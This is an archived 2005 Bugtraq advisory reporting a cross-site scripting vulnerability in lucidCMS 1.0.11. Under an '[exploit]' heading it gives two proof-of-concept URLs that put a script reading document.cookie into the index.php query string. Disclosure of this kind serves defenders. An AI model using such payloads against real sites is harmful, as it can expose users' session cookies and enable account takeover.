[40481] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

lucidCMS 1.0.11 is susceptible to a cross site scripting attack

daemon@ATHENA.MIT.EDU (x1ngbox@securityfocus.com,gmail@se)
Tue Sep 27 14:50:14 2005

Date: 27 Sep 2005 13:03:51 -0000
Message-ID: <20050927130351.26707.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: x1ngbox@securityfocus.com, gmail@securityfocus.com,
        com@securityfocus.com
To: bugtraq@securityfocus.com

[Description]:
lucidCMS is a simple and flexible content management system for the individual or organization that wishes to manage a collection of webpages without the overhead and complexity of other available
"community" CMS options.

[version]:lucidCMS 1.0.11

[vendor]:www.lucidcms.net

[Vulnerability]: cross site script


[exploit]:
http://[host]/[cms]/index.php?<script>alert(document.cookie);</script>
http://[host]/[cms]/?<script>alert(document.cookie);</script>


.......[X1NG]..........
X1ngBox <at/> Gmail Com


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[40481] in bugtraq

lucidCMS 1.0.11 is susceptible to a cross site scripting attack

daemon@ATHENA.MIT.EDU (x1ngbox@securityfocus.com,gmail@se)Tue Sep 27 14:50:14 2005

daemon@ATHENA.MIT.EDU (x1ngbox@securityfocus.com,gmail@se)
Tue Sep 27 14:50:14 2005